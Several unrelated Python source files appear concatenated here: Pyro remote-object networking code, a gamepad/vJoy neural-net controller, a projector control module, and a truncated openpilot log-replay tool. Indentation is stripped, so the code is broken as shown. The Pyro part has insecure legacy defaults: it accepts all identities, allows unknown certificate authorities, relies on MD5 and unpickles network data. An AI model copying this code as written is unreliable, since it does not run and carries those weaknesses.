# return a special exception that will be processed by client;
# it will call the internal 'remote_supply_code' member
if importer:
modname=importer.name
fromlist=importer.fromlist
else:
modname = x.args[0][16:]
fromlist=None
self.returnException(conn, _InternalNoModuleError(modname,fromlist),0) # don't shutdown!
else:
Log.error('PYROAdapter','code problem with incoming object: '+str(x))
self.returnException(conn, NoModuleError(* x.args))
return
try:
# find the object in the implementation database of our daemon
o=daemon.implementations[req[0]]
except (KeyError, TypeError) ,x:
Log.warn('PYROAdapter','Invocation to unknown object ignored:',x)
self.returnException(conn, ProtocolError('unknown object ID'))
return
else:
# Do the invocation. We are already running in our own thread.
if req[2]&constants.RIF_Oneway and daemon.threaded: # flags
# received a oneway call, run this in its own thread.
thread=Thread(target=self._handleInvocation2, args=(daemon,req,pflags,conn,o))
thread.setDaemon(1) # thread must exit at program termination.
thread.start()
else:
# not oneway or not in threaded mode, just do the invocation synchronously
self._handleInvocation2(daemon,req,pflags,conn,o)
def _handleInvocation2(self, daemon, req, pflags, conn, obj):
try:
flags=req[2]
importer=None
if not Pyro.config.PYRO_MOBILE_CODE:
res = obj[0].Pyro_dyncall(req[1],flags,req[3]) # (method,flags,args)
else:
try:
# install a custom importer to intercept any extra needed modules
# when executing the remote method. (using the data passed in by
# the client may trigger additional imports)
_agentImportLock.acquire()
importer=agent_import(__builtin__.__import__)
__builtin__.__import__=importer
_agentImportLock.release()
res = obj[0].Pyro_dyncall(req[1],flags,req[3]) # (method,flags,args)
finally:
__builtin__.__import__=importer.orig_import
if flags&constants.RIF_Oneway:
return # no result, return immediately
# reply the result to the caller
if pflags&PFLG_XMLPICKLE_GNOSIS:
replyflags=PFLG_XMLPICKLE_GNOSIS
if Pyro.config.PYRO_XML_PICKLE=='gnosis':
body=pickle.dumps(res,Pyro.config.PYRO_PICKLE_FORMAT)
else:
body=util.getXMLPickle('gnosis').dumps(res,Pyro.config.PYRO_PICKLE_FORMAT)
else:
replyflags=0
body=pickle.dumps(res,Pyro.config.PYRO_PICKLE_FORMAT)
sock_sendmsg(conn.sock, self.createMsg(body,replyflags),self.timeout)
except ImportError,ix:
if Pyro.config.PYRO_MOBILE_CODE:
# Return a special exception that will be processed by client;
# it will call the internal 'remote_supply_code' member.
# We have to use this seemingly complex way to signal the client
# to supply us some code, but it is only a proxy! We can't *call* it!
if importer:
# grab the import info from our importer
name=importer.name
fromlist=importer.fromlist
else:
# XXX the importerror sometimes doesn't contain the package :-(
name=ix.args[0][16:]
fromlist=None
Log.msg('PYROAdapter','failed to import',name)
self.returnException(conn, _InternalNoModuleError(name,fromlist),0) # don't shutdown!
else:
Log.error('PYROAdapter','code problem with incoming object: '+str(ix))
self.returnException(conn, NoModuleError(* ix.args))
except Exception:
daemon.handleError(conn)
def returnException(self, conn, exc, shutdown=1, args=None):
# return an encapsulated exception to the client
if conn.pflags&PFLG_XMLPICKLE_GNOSIS:
pic=util.getXMLPickle('gnosis')
else:
pic=pickle
try:
body=pic.dumps(PyroExceptionCapsule(exc,args),Pyro.config.PYRO_PICKLE_FORMAT)
except Exception,x:
# hmm, pickling the exception failed... pickle the string instead
body=pic.dumps(PyroExceptionCapsule(PyroError(str(x)),args),Pyro.config.PYRO_PICKLE_FORMAT)
sock_sendmsg(conn.sock, self.createMsg(body),self.timeout)
if shutdown:
conn.close()
def handleConnection(self, conn, tcpserver):
# Server-side connection stuff. Use auth code from tcpserver's validator.
try:
# Validate the connection source (host) immediately,
# if it's ok, send authentication challenge, and read identification data to validate.
(ok,reasonCode) = tcpserver.newConnValidator.acceptHost(tcpserver,conn)
if ok:
challenge=tcpserver.newConnValidator.createAuthChallenge(tcpserver,conn)
if len(challenge)!=self.AUTH_CHALLENGE_SIZE:
raise ValueError("Auth challenge must be exactly "+`self.AUTH_CHALLENGE_SIZE`+" bytes")
sock_sendmsg(conn.sock, self.createMsg(challenge),self.timeout)
ver,body,pflags = self.receiveMsg(conn)
if ver==self.version and body.startswith(self.connectMSG):
token=body[len(self.connectMSG):]
(ok,reasonCode) = tcpserver.newConnValidator.acceptIdentification(tcpserver,conn,token,challenge)
if ok:
self.sendAccept(conn)
conn.connected=1
return 1
else:
self.sendDeny(conn,reasonCode)
else:
self.sendDeny(conn,reasonCode)
return 0
except ProtocolError:
return 0
# import wrapper class to help with importing remote modules
class agent_import:
def __init__(self, orig_import):
self.orig_import=orig_import
def __call__(self,name, globals={},locals={},fromlist=None):
# save the import details:
self.name=name # note: this must be a str object
self.fromlist=fromlist
return self.orig_import(name,globals,locals,fromlist)
#
# The SSL adapter that handles SSL connections instead of regular sockets.
#
class PYROSSLAdapter(PYROAdapter):
def __init__(self):
PYROAdapter.__init__(self)
try:
from M2Crypto import SSL
except ImportError:
raise ProtocolError('SSL not available')
self.ctx = SSL.Context('sslv23')
self.ctx.load_cert(os.path.join(Pyro.config.PYROSSL_CERTDIR, Pyro.config.PYROSSL_CLIENT_CERT))
self.ctx.load_client_ca(os.path.join(Pyro.config.PYROSSL_CERTDIR, Pyro.config.PYROSSL_CA_CERT))
self.ctx.load_verify_info(os.path.join(Pyro.config.PYROSSL_CERTDIR, Pyro.config.PYROSSL_CA_CERT))
self.ctx.set_verify(SSL.verify_peer | SSL.verify_fail_if_no_peer_cert,10)
self.ctx.set_allow_unknown_ca(1)
Log.msg('PYROSSLAdapter','SSL Context initialized')
def setTimeout(self, timeout):
PYROAdapter.setTimeout(self, timeout)
def bindToURI(self,URI):
if URI.protocol not in ('PYROSSL','PYROLOCSSL'):
Log.error('PYROSSLAdapter','incompatible protocol in URI:',URI.protocol)
raise ProtocolError('incompatible protocol in URI')
try:
from M2Crypto import SSL
self.URI=URI.clone()
sock = SSL.Connection(self.ctx,socket.socket(socket.AF_INET, socket.SOCK_STREAM))
sock.connect((URI.address, URI.port))
conn=TCPConnection(sock, sock.getpeername())
# receive the authentication challenge string, and use that to build the actual identification string.
authChallenge=self.recvAuthChallenge(conn)
# reply with our ident token, generated from the ident passphrase and the challenge
msg = self._sendConnect(sock,self.newConnValidator.createAuthToken(self.ident, authChallenge, conn.addr, self.URI, None) )
if msg==self.acceptMSG:
self.conn=conn
self.conn.connected=1
Log.msg('PYROSSLAdapter','connected to',str(URI))
if URI.protocol=='PYROLOCSSL':
self.resolvePYROLOC_URI("PYROSSL") # updates self.URI
elif msg[:len(self.denyMSG)]==self.denyMSG:
try:
raise ConnectionDeniedError(constants.deniedReasons[int(msg[-1])])
except (KeyError,ValueError):
raise ConnectionDeniedError('invalid response')
except socket.error:
Log.msg('PYROSSLAdapter','connection failed to URI',str(URI))
raise ProtocolError('connection failed')
def _sendConnect(self, sock, ident):
return PYROAdapter._sendConnect(self, sock, ident)
def getProtocolAdapter(protocol):
if protocol in ('PYRO', 'PYROLOC'):
return PYROAdapter()
elif protocol in ('PYROSSL', 'PYROLOCSSL'):
return PYROSSLAdapter()
else:
Log.error('getProtocolAdapter','unsupported protocol:',protocol)
raise ProtocolError('unsupported protocol')
#-------- TCPConnection object for TCPServer class
class TCPConnection:
def __init__(self, sock, addr):
self.sock = sock
set_sock_keepalive(self.sock) # enable tcp/ip keepalive on this socket
self.addr = addr
self.connected=0 # connected?
self.pflags=0 # protocol flags
def __del__(self):
self.close()
def fileno(self):
return self.sock.fileno()
def close(self):
#self.sock.makefile().flush()
self.sock.close()
self.connected=0
def shutdown(self):
#self.sock.makefile().flush()
self.sock.shutdown(2) # no further send/receives
def __str__(self):
return 'TCPConnection with '+str(self.addr)+' connected='+str(self.connected)
#-------- The New Connection Validators:
#-------- DefaultConnValidator checks max number of connections & identification
#-------- and ident check is done using hmac-md5 secure hash of passphrase+challenge.
#-------- Contains client- & server-side auth code.
class DefaultConnValidator:
def __init__(self):
self.setAllowedIdentifications(None) # default=accept all (None means all!)
def acceptHost(self,daemon,connection):
if len(daemon.connections)>=Pyro.config.PYRO_MAXCONNECTIONS:
Log.msg('DefaultConnValidator','Too many open connections, closing',connection,'#conns=',len(daemon.connections))
return (0, constants.DENIED_SERVERTOOBUSY)
return (1,0)
def acceptIdentification(self, daemon, connection, token, challenge):
if "all" in self.allowedIDs:
return (1,0)
for authid in self.allowedIDs[:]:
if self.createAuthToken(authid, challenge, connection.addr, None, daemon) == token:
return (1,0)
Log.warn('DefaultConnValidator','connect authentication failed on conn ',connection)
return (0,constants.DENIED_SECURITY)
def createAuthToken(self, authid, challenge, peeraddr, URI, daemon):
# Called from both client and server, is used to be able to validate the token.
# client: URI & peeraddr provided, daemon is None
# server: URI is None, peeraddr and daemon provided.
# Return hmac-md5 secure hash of our authentication phrase & the challenge.
return hmac.new(challenge, authid).digest()
def createAuthChallenge(self, tcpserver, conn):
# Server-side only, when new connection comes in.
# Challenge is secure hash of: server IP, process ID, timestamp, random value
# (NOTE: MUST RETURN EXACTLY AUTH_CHALLENGE_SIZE(=16) BYTES!)
try:
pid=os.getpid()
except:
pid=id(self) # XXX jython has no getpid()
string = '%s-%d-%.20f-%.20f' %(str(getIPAddress()), pid, time.time(), random.random())
return md5.new(string).digest()
def mungeIdent(self, ident):
# munge the identification string into something else that's
# not easily guessed or recognised, like the md5 hash:
return md5.new(ident).digest()
def setAllowedIdentifications(self, ids):
if ids is not None:
if type(ids) in (types.TupleType, types.ListType):
self.allowedIDs=map(self.mungeIdent, ids) # don't store ids themselves
else:
raise TypeError("ids must be a list")
else:
self.allowedIDs=["all"] # trick: allow all incoming authentications.
#-------- basic SSL connection validator, a specialized default validator.
class BasicSSLValidator(DefaultConnValidator):
def __init__(self):
DefaultConnValidator.__init__(self)
def acceptHost(self,daemon,connection):
(ok,code) = DefaultConnValidator.acceptHost(self, daemon, connection)
if ok:
peercert=connection.sock.get_peer_cert()
return self.checkCertificate(peercert)
return (ok,code)
def checkCertificate(self,cert):
# do something interesting with the cert here, in a subclass :)
if cert is None:
return (0,constants.DENIED_SECURITY)
return (1,0)
#-------- Helper class for local storage.
class LocalStorage:
def __init__(self):
self.caller=None
#-------- TCPServer base class
class TCPServer:
def __init__(self, port, host='', threaded=_has_threading,prtcol='PYRO'):
self._ssl_server = 0
self.connections = [] # connection threads
self.initTLS=lambda tls: None # default do-nothing func
try:
if os.name=='java':
raise NotImplementedError('Pyro server not yet supported on Jython') # XXX
if prtcol=='PYROSSL':
try:
from M2Crypto import SSL
except ImportError:
raise ProtocolError('SSL not available')
try:
self.ctx = SSL.Context('sslv23')
self.ctx.load_cert(os.path.join(Pyro.config.PYROSSL_CERTDIR, Pyro.config.PYROSSL_SERVER_CERT))
self.ctx.load_client_ca(os.path.join(Pyro.config.PYROSSL_CERTDIR, Pyro.config.PYROSSL_CA_CERT))
self.ctx.load_verify_info(os.path.join(Pyro.config.PYROSSL_CERTDIR, Pyro.config.PYROSSL_CA_CERT))
self.ctx.set_verify(SSL.verify_peer | SSL.verify_fail_if_no_peer_cert,10)
self.ctx.set_allow_unknown_ca(1)
self._ssl_server = 1
Log.msg('TCPServer','SSL Context initialized')
except:
Log.warn('TCPServer','SSL Context could not be initialized !!!')
self.setNewConnectionValidator(BasicSSLValidator())
else:
self.setNewConnectionValidator(DefaultConnValidator())
# create server socket for new connections
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
set_reuse_addr(self.sock)
self.sock.bind((host,port))
self.sock.listen(Pyro.config.PYRO_TCP_LISTEN_BACKLOG)
# rest of members
self.threaded = threaded
self.mustShutdown=0 # global shutdown
self.localStorage=LocalStorage() # TLS for systems that don't have threads
return
except socket.error,msg:
raise ProtocolError(msg)
Log.msg('TCPServer','initialized')
def __del__(self):
self.closedown(nolog=1)
def setInitTLS(self, initTLS):
if not callable(initTLS):
raise TypeError("initTLS must be callable object")
self.initTLS=initTLS
# if in single thread mode, (re-)init the TLS right away.
if not Pyro.config.PYRO_MULTITHREADED:
self.initTLS(self.localStorage)
def closedown(self, nolog=0):
# explicit closedown request
if len(self.connections)>0:
if not nolog:
Log.warn('TCPServer','Shutting down but there are still',len(self.connections),'active connections')
for c in self.connections[:]:
if isinstance(c,TCPConnection):
c.close()
if isinstance(c,Thread):
c.join()
self.connections=[]
if hasattr(self,'sock'):
self.sock.close()
del self.sock
def setNewConnectionValidator(self,validator):
if not isinstance(validator, DefaultConnValidator):
raise TypeError("validator must be specialization of DefaultConnValidator")
self.newConnValidator=validator
def getNewConnectionValidator(self):
return self.newConnValidator
def connectionHandler(self, conn):
# Handle the connection and all requests that arrive on it.
# This is only called in multithreading mode.
try:
if self.getAdapter().handleConnection(conn, self):
Log.msg('TCPServer','new connection ',conn, ' #conns=',len(self.connections))
while not self.mustShutdown:
try:
if not conn.connected:
# connection has been closed in the meantime!
raise ConnectionClosedError()
ins,outs,exs=safe_select([conn],[],[],2)
if conn in ins or conn in exs:
self.handleInvocation(conn)
except ConnectionClosedError:
# client went away. Exit immediately
self.removeConnection(conn)
return
except (PyroExceptionCapsule, Exception):
self.handleError(conn)
else:
# log entry has already been written by newConnValidator
self.removeConnection(conn)
finally:
# exiting thread.
self._removeFromConnectionList(None)
def _removeFromConnectionList(self, obj):
if self.threaded and currentThread:
obj=currentThread()
try:
self.connections.remove(obj)
except ValueError:
pass
# this is the preferred way of dealing with the request loop.
def requestLoop(self, condition=lambda:1, timeout=3, others=[], callback=None):
while condition() and not self.mustShutdown:
self.handleRequests(timeout,others,callback)
def handleRequests(self, timeout=None, others=[], callback=None):
if others and not callback:
raise ProtocolError('callback required')
if self.threaded:
self._handleRequest_Threaded(timeout,others,callback)
else:
self._handleRequest_NoThreads(timeout,others,callback)
def _handleRequest_NoThreads(self,timeout,others,callback):
# self.connections is used to keep track of TCPConnections
socklist = self.connections+[self.sock]+others
ins,outs,exs = safe_select(socklist,[],[],timeout)
if self.sock in ins:
# it was the server socket, new incoming connection
ins.remove(self.sock)
if self._ssl_server:
from M2Crypto import SSL
try:
csock, addr = self.sock.accept()
sslsock = SSL.Connection(self.ctx,csock)
sslsock.setup_addr(addr)
sslsock.setup_ssl()
sslsock.set_accept_state()
sslsock.accept_ssl()
except SSL.SSLError,error:
if str(error) in('unexpected eof', 'http request', 'tlsv1 alert unknown ca', 'peer did not return a certificate'):
return
else:
raise
csock=sslsock
else:
csock, addr = self.sock.accept()
conn=TCPConnection(csock,addr)
if self.getAdapter().handleConnection(conn, self):
Log.msg('TCPServer','new connection ',conn, ' #conns=',len(self.connections))
self.connections.append(conn)
else:
# connection denied, log entry has already been written by newConnValidator
self.removeConnection(conn)
for c in ins[0:]:
if isinstance(c,TCPConnection):
ins.remove(c)
try:
self.handleInvocation(c)
if not c.connected:
self.removeConnection(c)
except ConnectionClosedError:
# client went away.
self.removeConnection(c)
except:
self.handleError(c)
if ins and callback:
# the 'others' must have fired...
callback(ins)
# def handleInvocation(self, conn): .... abstract method (implemented in subclass)
def _handleRequest_Threaded(self,timeout,others,callback):
# self.connections is used to keep track of connection Threads
socklist = [self.sock]+others
ins,outs,exs = safe_select(socklist,[],[],timeout)
if self.sock in ins:
# it was the server socket, new incoming connection
if self._ssl_server:
from M2Crypto import SSL
try:
csock, addr = self.sock.accept()
sslsock = SSL.Connection(self.ctx,csock)
sslsock.setup_addr(addr)
sslsock.setup_ssl()
sslsock.set_accept_state()
sslsock.accept_ssl()
except SSL.SSLError,error:
Log.warn('TCPServer','SSL error: '+str(error))
# print "SSL Error:",error
csock.close()
return
csock=sslsock
else:
csock, addr = self.sock.accept()
conn=TCPConnection(csock,addr)
thread=Thread(target=self.connectionHandler, args=(conn,))
thread.setDaemon(1) # thread must exit at program termination.
thread.localStorage=LocalStorage()
self.initTLS(thread.localStorage)
self.connections.append(thread)
thread.start()
elif callback:
# the 'others' must have fired...
callback(ins)
def getLocalStorage(self):
# return storage object for this thread.
if self.threaded:
return currentThread().localStorage
else:
return self.localStorage
# to be called if a dropped connection is detected:
def removeConnection(self, conn):
conn.close()
self._removeFromConnectionList(conn)
Log.msg('TCPServer','removed connection ',conn,' #conns=',len(self.connections))
# to be called to stop all connections and shut down.
def shutdown(self):
self.mustShutdown=1
def getAdapter(self):
raise NotImplementedError,'must be overridden to return protocol adapter'
def handleError(self,conn):
raise NotImplementedError,'must be overridden'
def getServerSockets(self):
if self.threaded:
return [self.sock]
else:
return map(lambda conn: conn.sock, self.connections)+[self.sock]
# Sometimes safe_select() raises an select.error exception with the EINTR
# errno flag set, which basically tells the caller to try again later.
# This safe_select method works around this case and indeed just tries again.
def safe_select(r,w,e,timeout=None):
while True:
try:
if timeout is not None:
return select.select(r,w,e,timeout)
else:
return select.select(r,w,e)
except select.error,x:
if x.args[0] == errno.EINTR or (hasattr(errno, 'WSAEINTR') and x.args[0] == errno.WSAEINTR):
pass
else:
raise
|
gamepad.py | import numpy as np
import cv2
from mss import mss
from PIL import Image
from skimage.transform import resize
from skimage.io import imread
import math
import pyvjoy
from threading import Thread
from inputs import get_gamepad
from inputs import devices
import time
from train import create_model
def resize_image(img):
im = resize(img, (120, 160, 3))
im_arr = im.reshape((120, 160, 3))
return im_arr
coords = {'top': 34, 'left':3, 'width':640, 'height':480}
sct = mss()
white = (255, 255, 255)
orange = (0, 140, 255)
black = (0, 0, 0)
width = 640
height = 480
radius = 80
j = pyvjoy.VJoyDevice(2)
MAX_VJOY = 32767
MAX_JOY_VAL = math.pow(2, 15)
joy_x = 0
joy_y = 0
manual = False
recording = False
working = True
def gamepadThread():
global joy_x
global joy_y
global manual
global recording
global working
while True:
events = get_gamepad()
for event in events:
if (event.code == 'ABS_Y'):
joy_y = event.state / MAX_JOY_VAL
if (event.code == 'ABS_X'):
joy_x = event.state / MAX_JOY_VAL
if (event.code == 'BTN_TL' and event.state == True):
manual = not manual
state = ("off", "on")[manual]
print('Toggled manual ' + state)
if (event.code == 'BTN_SELECT' and event.state == True):
print('Escaping loop')
working = False
captureGamepad = Thread(target = gamepadThread)
captureGamepad.start()
def pingpongThread():
global manual
while True:
time.sleep(1)
manual = not manual
#pingpongLearning = Thread(target = pingpongThread)
#pingpongLearning.start()
model = create_model(keep_prob=1)
model.load_weights('model_weights.h5')
final_x = 0
final_y = 0
outfile = open('data/inputs.csv', 'a')
frame = 0
while working:
sct_img = sct.grab(coords)
img_bgr = Image.frombytes('RGB', (sct_img.size.width, sct_img.size.height), sct_img.rgb)
img_rgb = cv2.cvtColor(np.array(img_bgr), cv2.COLOR_RGB2BGR)
small = cv2.resize(np.array(img_rgb), (160, 120), interpolation = cv2.INTER_AREA)
resized = resize_image(small)
vec = np.expand_dims(resized, axis=0)
prediction = model.predict(vec, batch_size=1)[0]
circle_x = prediction[0]
circle_y = prediction[1]
ball_color = white
if (manual == True):
final_x = joy_x
final_y = joy_y
ball_color = orange
else:
final_x = circle_x
final_y = circle_y * 0.75
j.data.wAxisX = int(((final_x / 2) + 0.5) * MAX_VJOY)
j.data.wAxisY = int(((-final_y / 2) + 0.5) * MAX_VJOY)
j.update()
if False:
adress = "data/h" + str(frame) + ".png"
cv2.imwrite(adress, small)
outfile.write(adress + ';' + str(final_x) + ';' + str(final_y) + '\n')
frame += 1
#big = cv2.resize(resized, (int(width), int(height)), interpolation = cv2.INTER_AREA)
#ball = (int(width/2 + (final_x * radius)), int(height/2 - (final_y * radius)))
#final = cv2.line(big, (int(width/2), int(height/2)), ball, black, 5)
#final = cv2.circle(final, ball, 20, ball_color, -1)
#cv2.imshow('test', final)
if cv2.waitKey(25) & 0xFF == ord('q'):
cv2.destroyAllWindows()
break
outfile.close()
|
constellation_projector.py | # Standard imports
import datetime
import logging
import os
import threading
# Constellation imports
import config
import projector_control
class Projector:
"""Holds basic data about a projector"""
def __init__(self, id_, ip, connection_type, mac_address=None, make=None, password=None):
self.id = id_
self.type = "PROJECTOR"
self.ip = ip # IP address of the projector
self.password = password # Password to access PJLink
self.mac_address = mac_address # For use with Wake on LAN
self.connection_type = connection_type
self.make = make
self.config = {"allowed_actions": ["power_on", "power_off"],
"description": config.componentDescriptions.get(id_, "")}
self.state = {"status": "OFFLINE"}
self.last_contact_datetime = datetime.datetime(2020, 1, 1)
self.update(full=True)
def seconds_since_last_contact(self) -> float:
"""Calculate the number of seconds since the component last checked in."""
diff = datetime.datetime.now() - self.last_contact_datetime
return diff.total_seconds()
def update(self, full=False):
"""Contact the projector to get the latest state"""
error = False
try:
if self.connection_type == 'pjlink':
connection = projector_control.pjlink_connect(self.ip, password=self.password)
if full:
self.state["model"] = projector_control.pjlink_send_command(connection, "get_model")
self.state["power_state"] = projector_control.pjlink_send_command(connection, "power_state")
self.state["lamp_status"] = projector_control.pjlink_send_command(connection, "lamp_status")
self.state["error_status"] = projector_control.pjlink_send_command(connection, "error_status")
elif self.connection_type == "serial":
connection = projector_control.serial_connect_with_url(self.ip, make=self.make)
if full:
self.state["model"] = projector_control.serial_send_command(connection, "get_model", make=self.make)
self.state["power_state"] = projector_control.serial_send_command(connection, "power_state",
make=self.make)
self.state["lamp_status"] = projector_control.serial_send_command(connection, "lamp_status",
make=self.make)
self.state["error_status"] = projector_control.serial_send_command(connection, "error_status",
make=self.make)
self.last_contact_datetime = datetime.datetime.now()
except Exception as e:
# print(e)
error = True
if error and (self.seconds_since_last_contact() > 60):
self.state = {"status": "OFFLINE"}
else:
if self.state["power_state"] == "on":
self.state["status"] = "ONLINE"
else:
self.state["status"] = "STANDBY"
def queue_command(self, cmd):
"""Function to spawn a thread that sends a command to the projector.
Named "queue_command" to match what is used for exhibitComponents
"""
print(f"Queuing command {cmd} for {self.id}")
thread_ = threading.Thread(target=self.send_command, args=[cmd])
thread_.daemon = True
thread_.start()
def send_command(self, cmd):
"""Connect to a PJLink projector and send a command"""
# Translate commands for projector_control
cmd_dict = {
"shutdown": "power_off",
"sleepDisplay": "power_off",
"wakeDisplay": "power_on"
}
try:
if self.connection_type == "pjlink":
connection = projector_control.pjlink_connect(self.ip, password=self.password)
if cmd in cmd_dict:
projector_control.pjlink_send_command(connection, cmd_dict[cmd])
else:
projector_control.pjlink_send_command(connection, cmd)
elif self.connection_type == "serial":
connection = projector_control.serial_connect_with_url(self.ip, make=self.make)
if cmd in cmd_dict:
projector_control.serial_send_command(connection, cmd_dict[cmd], make=self.make)
else:
projector_control.serial_send_command(connection, cmd, make=self.make)
except Exception as e:
print(e)
def get_projector(this_id) -> Projector:
"""Return a projector with the given id, or None if no such projector exists"""
return next((x for x in config.projectorList if x.id == this_id), None)
def poll_projectors():
"""Ask each projector to send a status update at an interval.
"""
for projector in config.projectorList:
new_thread = threading.Thread(target=projector.update)
new_thread.daemon = True # So it dies if we exit
new_thread.start()
config.polling_thread_dict["poll_projectors"] = threading.Timer(30, poll_projectors)
config.polling_thread_dict["poll_projectors"].start()
# Set up log file
log_path = os.path.join(config.APP_PATH, "control_server.log")
logging.basicConfig(datefmt='%Y-%m-%d %H:%M:%S',
filename=log_path,
format='%(levelname)s, %(asctime)s, %(message)s',
level=logging.DEBUG)
|
unlogger.py | #!/usr/bin/env python3
import argparse
import os
import sys
import zmq
import time
import signal
import multiprocessing
from uuid import uuid4
from collections import namedtuple
from collections import deque
from datetime import datetime
from cereal import log as capnp_log
from cereal.services import service_list
from cereal.messaging import pub_sock, MultiplePublishersError
from cereal.visionipc.visionipc_pyx import VisionIpcServer, VisionStreamType # pylint: disable=no-name-in-module, import-error
from common import realtime
from common.transformations.camera import eon_f_frame_size, tici_f_frame_size
from tools.lib.kbhit import KBHit
from tools.lib.logreader import MultiLogIterator
from tools.lib.route import Route
from tools.lib.route_framereader import RouteFrameReader
# Commands.
SetRoute = namedtuple("SetRoute", ("name", "start_time", "data_dir"))
SeekAbsoluteTime = namedtuple("SeekAbsoluteTime", ("secs",))
SeekRelativeTime = namedtuple("SeekRelativeTime", ("secs",))
TogglePause = namedtuple("TogglePause", ())
StopAndQuit = namedtuple("StopAndQuit", ())
VIPC_TYP = "vipc"
class UnloggerWorker(object):
def __init__(self):
self._frame_reader = None
self._cookie = None
self._readahead = deque()
def run(self, commands_address, data_address, pub_types):
zmq.Context._instance = None
commands_socket = zmq.Context.instance().socket(zmq.PULL)
commands_socket.connect(commands_address)
data_socket = zmq.Context.instance().socket(zmq.PUSH)
data_socket.connect(data_address)
poller = zmq.Poller()
poller.register(commands_socket, zmq.POLLIN)
# We can't publish frames without roadEncodeIdx, so add when it's missing.
if "roadCameraState" in pub_types:
pub_types["roadEncodeIdx"] = None
# gc.set_debug(gc.DEBUG_LEAK | gc.DEBUG_OBJECTS | gc.DEBUG_STATS | gc.DEBUG_SAVEALL |
# gc.DEBUG_UNCOLLECTABLE)
# TODO: WARNING pycapnp leaks memory all over the place after unlogger runs for a while, gc
# pauses become huge because there are so many tracked objects solution will be to switch to new
# cython capnp
try:
route = None
while True:
while poller.poll(0.) or route is None:
cookie, cmd = commands_socket.recv_pyobj()
route = self._process_commands(cmd, route, pub_types)
# **** get message ****
self._read_logs(cookie, pub_types)
self._send_logs(data_socket)
finally:
if self._frame_reader is not None:
self._frame_reader.close()
data_socket.close()
commands_socket.close()
def _read_logs(self, cookie, pub_types):
fullHEVC = capnp_log.EncodeIndex.Type.fullHEVC
lr = self._lr
while len(self._readahead) < 1000:
route_time = lr.tell()
msg = next(lr)
typ = msg.which()
if typ not in pub_types:
continue
# **** special case certain message types ****
if typ == "roadEncodeIdx" and msg.roadEncodeIdx.type == fullHEVC:
# this assumes the roadEncodeIdx always comes before the frame
self._frame_id_lookup[
msg.roadEncodeIdx.frameId] = msg.roadEncodeIdx.segmentNum, msg.roadEncodeIdx.segmentId
#print "encode", msg.roadEncodeIdx.frameId, len(self._readahead), route_time
self._readahead.appendleft((typ, msg, route_time, cookie))
def _send_logs(self, data_socket):
while len(self._readahead) > 500:
typ, msg, route_time, cookie = self._readahead.pop()
smsg = msg.as_builder()
if typ == "roadCameraState":
frame_id = msg.roadCameraState.frameId
# Frame exists, make sure we have a framereader.
# load the frame readers as needed
s1 = time.time()
try:
img = self._frame_reader.get(frame_id, pix_fmt="rgb24")
except Exception:
img = None
fr_time = time.time() - s1
if fr_time > 0.05:
print("FRAME(%d) LAG -- %.2f ms" % (frame_id, fr_time*1000.0))
if img is not None:
img = img[:, :, ::-1] # Convert RGB to BGR, which is what the camera outputs
img = img.flatten()
bts = img.tobytes()
smsg.roadCameraState.image = bts
extra = (smsg.roadCameraState.frameId, smsg.roadCameraState.timestampSof, smsg.roadCameraState.timestampEof)
data_socket.send_pyobj((cookie, VIPC_TYP, msg.logMonoTime, route_time, extra), flags=zmq.SNDMORE)
data_socket.send(bts, copy=False)
data_socket.send_pyobj((cookie, typ, msg.logMonoTime, route_time), flags=zmq.SNDMORE)
data_socket.send(smsg.to_bytes(), copy=False)
def _process_commands(self, cmd, route, pub_types):
seek_to = None
if route is None or (isinstance(cmd, SetRoute) and route.name != cmd.name):
seek_to = cmd.start_time
route = Route(cmd.name, cmd.data_dir)
self._lr = MultiLogIterator(route.log_paths(), wraparound=True)
if self._frame_reader is not None:
self._frame_reader.close()
if "roadCameraState" in pub_types or "roadEncodeIdx" in pub_types:
# reset frames for a route
self._frame_id_lookup = {}
self._frame_reader = RouteFrameReader(
route.camera_paths(), None, self._frame_id_lookup, readahead=True)
# always reset this on a seek
if isinstance(cmd, SeekRelativeTime):
seek_to = self._lr.tell() + cmd.secs
elif isinstance(cmd, SeekAbsoluteTime):
seek_to = cmd.secs
elif isinstance(cmd, StopAndQuit):
exit()
if seek_to is not None:
print("seeking", seek_to)
if not self._lr.seek(seek_to):
print("Can't seek: time out of bounds")
else:
next(self._lr) # ignore one
return route
def _get_address_send_func(address):
sock = pub_sock(address)
return sock.send
def _get_vipc_server(length):
w, h = {3 * w * h: (w, h) for (w, h) in [tici_f_frame_size, eon_f_frame_size]}[length]
vipc_server = VisionIpcServer("camerad")
vipc_server.create_buffers(VisionStreamType.VISION_STREAM_RGB_BACK, 4, True, w, h)
vipc_server.start_listener()
return vipc_server
def unlogger_thread(command_address, forward_commands_address, data_address, run_realtime,
address_mapping, publish_time_length, bind_early, no_loop, no_visionipc):
# Clear context to avoid problems with multiprocessing.
zmq.Context._instance = None
context = zmq.Context.instance()
command_sock = context.socket(zmq.PULL)
command_sock.bind(command_address)
forward_commands_socket = context.socket(zmq.PUSH)
forward_commands_socket.bind(forward_commands_address)
data_socket = context.socket(zmq.PULL)
data_socket.bind(data_address)
# Set readahead to a reasonable number.
data_socket.setsockopt(zmq.RCVHWM, 10000)
poller = zmq.Poller()
poller.register(command_sock, zmq.POLLIN)
poller.register(data_socket, zmq.POLLIN)
if bind_early:
send_funcs = {
typ: _get_address_send_func(address)
for typ, address in address_mapping.items()
}
# Give subscribers a chance to connect.
time.sleep(0.1)
else:
send_funcs = {}
start_time = float("inf")
printed_at = 0
generation = 0
paused = False
reset_time = True
prev_msg_time = None
vipc_server = None
while True:
evts = dict(poller.poll())
if command_sock in evts:
cmd = command_sock.recv_pyobj()
if isinstance(cmd, TogglePause):
paused = not paused
if paused:
poller.modify(data_socket, 0)
else:
poller.modify(data_socket, zmq.POLLIN)
else:
# Forward the command the the log data thread.
# TODO: Remove everything on data_socket.
generation += 1
forward_commands_socket.send_pyobj((generation, cmd))
if isinstance(cmd, StopAndQuit):
return
reset_time = True
elif data_socket in evts:
msg_generation, typ, msg_time, route_time, *extra = data_socket.recv_pyobj(flags=zmq.RCVMORE)
msg_bytes = data_socket.recv()
if msg_generation < generation:
# Skip packets.
continue
if no_loop and prev_msg_time is not None and prev_msg_time > msg_time + 1e9:
generation += 1
forward_commands_socket.send_pyobj((generation, StopAndQuit()))
return
prev_msg_time = msg_time
msg_time_seconds = msg_time * 1e-9
if reset_time:
msg_start_time = msg_time_seconds
real_start_time = realtime.sec_since_boot()
start_time = min(start_time, msg_start_time)
reset_time = False
if publish_time_length and msg_time_seconds - start_time > publish_time_length:
generation += 1
forward_commands_socket.send_pyobj((generation, StopAndQuit()))
return
# Print time.
